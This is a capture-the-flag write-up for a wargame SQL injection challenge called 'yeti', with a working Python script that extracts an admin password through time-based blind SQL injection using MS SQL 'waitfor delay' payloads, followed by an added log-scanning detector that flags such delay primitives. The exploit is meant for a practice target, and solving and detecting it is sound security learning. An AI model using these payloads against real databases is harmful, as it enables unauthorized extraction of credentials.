yeti

This is the first screen of the challenge.

I recognized this as a Blind SQLi problem, and since there is no way to check the result through the output, I decided to solve it with Time-based Blind SQLi.

It uses waitfor delay (the MS SQL Server delay statement, matching the len() and unicode() functions in the payloads below).

The Python code written for this is as follows.

import requests
import time

URL = 'https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw='
PHPSESSID = 'MY_PHPSESSID'  # replace with your own session cookie
SLEEP = 2  # seconds requested with waitfor delay


def query(payload):
    # Send the payload and treat a response slower than SLEEP seconds as "true"
    start = time.time()
    cookies = {'PHPSESSID': PHPSESSID}
    requests.post(URL + payload, cookies=cookies)
    return time.time() - start > SLEEP


# result: 8
def find_pw_length():
    # Increase the guessed length until the delayed response signals a match
    pw_len = 1
    while not query("' if(len((select pw from prob_yeti where id='admin'))={}) waitfor delay '00:00:0{}'--".format(pw_len, SLEEP)):
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# result: 6425b725
def find_pw():
    # Recover one character per position by comparing its unicode() value
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query("' if(unicode(substring((select pw from prob_yeti where id='admin'),{},1))={}) waitfor delay '00:00:0{}'--".format(pos, character, SLEEP)):
                pw += chr(character)
                break
    print('pw: {}'.format(pw))
    return pw


find_pw()

Running it shows that pw is 6425b725.

Accessing https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw=6425b725 solves the problem.
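As an added example from the defender's side (not part of the original write-up): the delay primitive used above leaves a recognizable trace in web access logs, and comparing the delay requested in the payload with the measured response time tells an injection that actually executed apart from one that was blocked or never reached the database. The log format and the log lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (not from the original post). Fields:
# timestamp method path status duration_ms. Two probes executed (slow),
# one was blocked before reaching the database (fast), two are benign.
SAMPLE_LOG = """\
2024-01-01T10:00:00 GET /chall/yeti.php?pw=test 200 12
2024-01-01T10:00:01 POST /chall/yeti.php?pw=%27%20if(len((select%20pw%20from%20prob_yeti%20where%20id=%27admin%27))=8)%20waitfor%20delay%20%2700:00:02%27-- 200 2013
2024-01-01T10:00:04 POST /chall/yeti.php?pw=%27%20if(unicode(substring((select%20pw%20from%20prob_yeti%20where%20id=%27admin%27),1,1))=54)%20waitfor%20delay%20%2700:00:02%27-- 200 2009
2024-01-01T10:00:07 POST /chall/yeti.php?pw=%27%20waitfor%20delay%20%2700:00:05%27-- 403 15
2024-01-01T10:00:08 GET /chall/yeti.php?pw=6425b725 200 9
"""

# Delay primitives of the common engines; waitfor delay is the MSSQL one.
TIME_BASED_SQLI = re.compile(
    r"waitfor\s+delay|sleep\s*\(|benchmark\s*\(|pg_sleep\s*\(", re.IGNORECASE)
# Extracts the hh:mm:ss delay requested by a waitfor delay payload.
DELAY_RE = re.compile(r"waitfor\s+delay\s+'(\d\d):(\d\d):(\d\d)'", re.IGNORECASE)


def requested_delay_ms(decoded_path):
    """Delay in milliseconds the payload asked for, or None if none is present."""
    m = DELAY_RE.search(decoded_path)
    if not m:
        return None
    hours, minutes, seconds = (int(x) for x in m.groups())
    return (hours * 3600 + minutes * 60 + seconds) * 1000


def scan_log(text):
    """Return one dict per request carrying a time-based SQLi primitive.

    'executed' is True when the server took at least as long as the payload
    requested, i.e. the delay statement most likely ran on the database."""
    hits = []
    for line in text.splitlines():
        ts, _method, path, _status, duration = line.split()
        decoded = unquote(path)
        if not TIME_BASED_SQLI.search(decoded):
            continue
        wanted = requested_delay_ms(decoded)
        executed = wanted is not None and int(duration) >= wanted
        hits.append({"ts": ts, "path": decoded,
                     "duration_ms": int(duration), "executed": executed})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], "executed" if hit["executed"] else "attempted", hit["duration_ms"], "ms")
```

A burst of such hits against one endpoint, each delayed by exactly the requested interval, is the signature of the character-by-character extraction loop shown in the write-up.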
